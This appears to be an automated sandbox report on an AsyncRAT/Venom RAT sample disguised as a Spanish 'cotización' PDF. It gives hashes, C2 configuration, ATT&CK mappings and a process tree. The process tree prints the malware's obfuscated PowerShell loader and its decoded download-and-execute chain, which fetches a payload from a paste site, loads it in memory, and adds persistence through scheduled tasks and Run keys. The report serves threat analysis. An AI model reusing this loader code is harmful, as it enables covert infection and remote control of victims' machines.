asyncrat | 19b9972f970ca207cf8494582bdf8c68b8a1f9cbbc9a8df0151d05c26cb9b3a1

Analysis

max time kernel
128s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20250313-en
resource tags

arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
submitted
31/03/2025, 17:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

COTIZACIÓN_23-5_Pdf.vbs
Size

8.5MB
MD5

60ec698e60d2fb823393bc2ee1664742
SHA1

4c632c11036d0eec042d9eddb2b351ae2ed3caf4
SHA256

19b9972f970ca207cf8494582bdf8c68b8a1f9cbbc9a8df0151d05c26cb9b3a1
SHA512

e2e179b5444aa9fab84cb939a4864289bb61a4d2198a07e920eac9de5c1a210771f190b8d7470224007ec4b7d9442b37dfff8d2023258516960b207070c03e6f
SSDEEP

96:5JTmIl/6GLHWtZdJ7AZPFZI6kNl5C+VwX2vR5VU3hOGIAKJV2T45aBSSFfkD:TllyjjdVMFZNkNls2vv8hAJJV8ve

Score

10^/10

asyncrat default defense_evasion discovery execution persistence rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://textbin.net/raw/ezjmofz3s6

exe.dropper

https://textbin.net/raw/ezjmofz3s6

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

196.251.89.167:6900

Mutex

vcbkomkyscjsqqkd

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
6	5620	powershell.exe
24	5620	powershell.exe
30	5708	powershell.exe
31	5708	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3976	powershell.exe
5620	powershell.exe
4848	powershell.exe
5708	powershell.exe
980	powershell.exe
2736	powershell.exe
4316	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
3348	cmd.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 5708 set thread context of 3100	5708	powershell.exe	113

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2140	schtasks.exe

Suspicious behavior: EnumeratesProcesses 37 IoCs

pid	Process
3976	powershell.exe
3976	powershell.exe
5620	powershell.exe
5620	powershell.exe
5708	powershell.exe
5708	powershell.exe
5708	powershell.exe
4532	powershell.exe
4532	powershell.exe
4852	powershell.exe
4852	powershell.exe
4848	powershell.exe
4848	powershell.exe
4532	powershell.exe
4848	powershell.exe
4852	powershell.exe
4848	powershell.exe
980	powershell.exe
980	powershell.exe
980	powershell.exe
2736	powershell.exe
2736	powershell.exe
2736	powershell.exe
4316	powershell.exe
4316	powershell.exe
4316	powershell.exe
5708	powershell.exe
5708	powershell.exe
5708	powershell.exe
5708	powershell.exe
3100	MSBuild.exe
3100	MSBuild.exe
3100	MSBuild.exe
3100	MSBuild.exe
3100	MSBuild.exe
3100	MSBuild.exe
3100	MSBuild.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	3976	powershell.exe
Token: SeDebugPrivilege	5620	powershell.exe
Token: SeDebugPrivilege	5708	powershell.exe
Token: SeDebugPrivilege	4532	powershell.exe
Token: SeDebugPrivilege	4852	powershell.exe
Token: SeDebugPrivilege	4848	powershell.exe
Token: SeDebugPrivilege	980	powershell.exe
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeDebugPrivilege	4316	powershell.exe
Token: SeDebugPrivilege	3100	MSBuild.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3100	MSBuild.exe

Suspicious use of WriteProcessMemory 40 IoCs

description	pid	Process	procid_target
PID 4528 wrote to memory of 6116	4528	WScript.exe	85
PID 4528 wrote to memory of 6116	4528	WScript.exe	85
PID 4528 wrote to memory of 2140	4528	WScript.exe	87
PID 4528 wrote to memory of 2140	4528	WScript.exe	87
PID 4528 wrote to memory of 3976	4528	WScript.exe	89
PID 4528 wrote to memory of 3976	4528	WScript.exe	89
PID 3976 wrote to memory of 5620	3976	powershell.exe	91
PID 3976 wrote to memory of 5620	3976	powershell.exe	91
PID 5620 wrote to memory of 5708	5620	powershell.exe	97
PID 5620 wrote to memory of 5708	5620	powershell.exe	97
PID 5708 wrote to memory of 4848	5708	powershell.exe	98
PID 5708 wrote to memory of 4848	5708	powershell.exe	98
PID 5708 wrote to memory of 4852	5708	powershell.exe	99
PID 5708 wrote to memory of 4852	5708	powershell.exe	99
PID 5708 wrote to memory of 4532	5708	powershell.exe	100
PID 5708 wrote to memory of 4532	5708	powershell.exe	100
PID 4848 wrote to memory of 980	4848	powershell.exe	101
PID 4848 wrote to memory of 980	4848	powershell.exe	101
PID 3348 wrote to memory of 2736	3348	cmd.exe	105
PID 3348 wrote to memory of 2736	3348	cmd.exe	105
PID 2736 wrote to memory of 396	2736	powershell.exe	107
PID 2736 wrote to memory of 396	2736	powershell.exe	107
PID 396 wrote to memory of 4316	396	WScript.exe	108
PID 396 wrote to memory of 4316	396	WScript.exe	108
PID 4316 wrote to memory of 4716	4316	powershell.exe	110
PID 4316 wrote to memory of 4716	4316	powershell.exe	110
PID 5708 wrote to memory of 2728	5708	powershell.exe	111
PID 5708 wrote to memory of 2728	5708	powershell.exe	111
PID 5708 wrote to memory of 2728	5708	powershell.exe	111
PID 5708 wrote to memory of 6128	5708	powershell.exe	112
PID 5708 wrote to memory of 6128	5708	powershell.exe	112
PID 5708 wrote to memory of 6128	5708	powershell.exe	112
PID 5708 wrote to memory of 3100	5708	powershell.exe	113
PID 5708 wrote to memory of 3100	5708	powershell.exe	113
PID 5708 wrote to memory of 3100	5708	powershell.exe	113
PID 5708 wrote to memory of 3100	5708	powershell.exe	113
PID 5708 wrote to memory of 3100	5708	powershell.exe	113
PID 5708 wrote to memory of 3100	5708	powershell.exe	113
PID 5708 wrote to memory of 3100	5708	powershell.exe	113
PID 5708 wrote to memory of 3100	5708	powershell.exe	113

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\COTIZACIÓN_23-5_Pdf.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4528
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
  2⤵
  PID:6116
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2140
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★W★BR★DQ★M★BK★HU★SgBP★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\COTIZACIÓN_23-5_Pdf.vbs');powershell $Yolopolhggobek;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3976
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/XQ40JuJO/r/ee.etsap//:sptth'' , ''C:\Users\Admin\AppData\Local\Temp\COTIZACIÓN_23-5_Pdf.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5620
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops startup file
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:5708
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4848
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        6⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:980
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\COTIZACIÓN_23-5_Pdf.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4852
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\COTIZACIÓN_23-5_Pdf.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4532
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:2728
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:6128
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
- Suspicious use of WriteProcessMemory
PID:3348
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2736
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:396
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\COTIZACIÃ“N_23-5_Pdf.vbs'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4316
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\COTIZACIÃ“N_23-5_Pdf.vbs
        5⤵
        
        PID:4716

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
274b8262c64f6290b4006a615fa9899c

SHA1
31532b772197b7894b15b031cccbafd15ac0862a

SHA256
6b09bf7e2372c0bcb9df1fe4e403ec3e091c2467a716ffc9867df6bfb561aec4

SHA512
2f783d28b44ab55f5a7668f8f259e28fdba88100993a9e5e75f418ca9f6573a0eb8f825b1bbf3e0731df197335627394c5487221467bf8fb2298e4b02b02e9aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3035bf79f522dcce28fcfe12da45ce7f

SHA1
5c4f289f12397773a6c43402f16aaae24e9eca17

SHA256
f75e02dfce13a71d8cdf323eca9d8ad90e8cfb80d0b5eb6aba5e02eb71995c00

SHA512
865c3e98558a394207ebe3a8073030b6d213d03546991ae8b9ac75819dfd170f353a62bc29e6122e2dfd66a736b328d354a73d3dbb04e3280c78592eb44ab555

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
0c262feb3b5cc9802748791245b070ef

SHA1
e5d49276a5586d6e5dec3a01575eeba073c2473d

SHA256
d46f7e7219ce38c24a5f1d417ae5d320d2947c007a8bcdeec544697f78f71202

SHA512
e9eb0e90e672e1ad01ef822330c47b31ed2cc61d99941dca58b7e28437b3e69168f3c96d0a5f768ac2f8153d69d83a654c98b7b4379405ec204957aeccbe3a3d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
38a75629ad4e73a7ecfd1db99ee4071d

SHA1
42c19f66fc00fc253e3725c1f0a57c6dae5045de

SHA256
606fcef60cf28b293b3270463a9d900c529e49269281cee16159fa9978d8103d

SHA512
705537a89effa5268282c865dec8ab4326bda30e2e9be25987bb0a8ffd1ee2a7cedf756e7239ecf333082da5d2c3c8cc7e73a6b53fac08b45a18857df4ab92ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
520ff216c3f7d7c3d67393bea543fe23

SHA1
588939b12f373f3dcef0b9e5bbf4e8f578ef06ba

SHA256
88fce6a6dfcc22c2ea8eca77e2b43a15bc072bd79b7850c974a9930ca7ea74bf

SHA512
3374573132e1ac3bbcc99b9f2738296103cf8c39256018d18abccbe72921472825a2db4b660bf76d340242919e8cf433cb98d8031111a565c3a55db4143d6162

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
b5c78bd1ccd17b28aaa7ad36e1aec92f

SHA1
d1c92d2bde2bc712965fea7a89e0c61a8d722546

SHA256
fd9a8523579d32937436ececc43e63861e03c6ffe616889412f4912ee0ced744

SHA512
39b5f6cdb72ce74c806e10a04d997ccf0aa615c0bffb483bdb5c2c534e8697dfdaa89d0263c7ac157b2b6b9d93efca8b7b103e4b0982cb544733be52a04f9b92

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sfqjppbf.4al.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll01.txt

Filesize
34B

MD5
551de3894acfc565eaf2ea5fd7a7760a

SHA1
39a4d83c3d551deca48be49fda4a2d1824c084b8

SHA256
ff53ba58dd8ec7f149bd3aa6c14b60baf059d46cc0b312f234858710f6c3635f

SHA512
5545f75a3c632756807a6dbeec49af2f645ae295d27f0df0c4205b505baadf8d5b5057a0fb95a6edc79bbd2c561e619c8c3e2c707d09b8354285c9ef735f3e8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll02.txt

Filesize
300KB

MD5
1ed4ff6b14c799919ea5baaa9a01134d

SHA1
8d498985e857c1ec16c9f0b05cae4d684fb145da

SHA256
6d7cfe7ef865d8a7f4cee574736cf8ccf1b5dcba1c3c3b48a50498038921b384

SHA512
2ae2eab2f09e7499a8e078e35765868d5d8ca77e59ecb97c46700f7d2c4d324f438b63a81084de5ec484efa9383775688726136a8a02c82b0c0d9c1852ae5c1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll03.ps1

Filesize
988B

MD5
2e34e9ef86b79d3974864f9806080abd

SHA1
62c70a08dc7ef85500613ecf0df794e1c11407a1

SHA256
9117cd1b2842dfc4128adedf4354762c67c7c001375a03ea3735758721487fe7

SHA512
95bf30ba6617542c3f2f5bfbacadce4d0198c4e213cadab6fc56bc4f5400b0dae07c3caf511dd9e9edf81194b626366bce6692cb5a639ed8c822be27a4bb9804

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx1.ps1

Filesize
282B

MD5
b094f227c79abfc0903a9b305203075a

SHA1
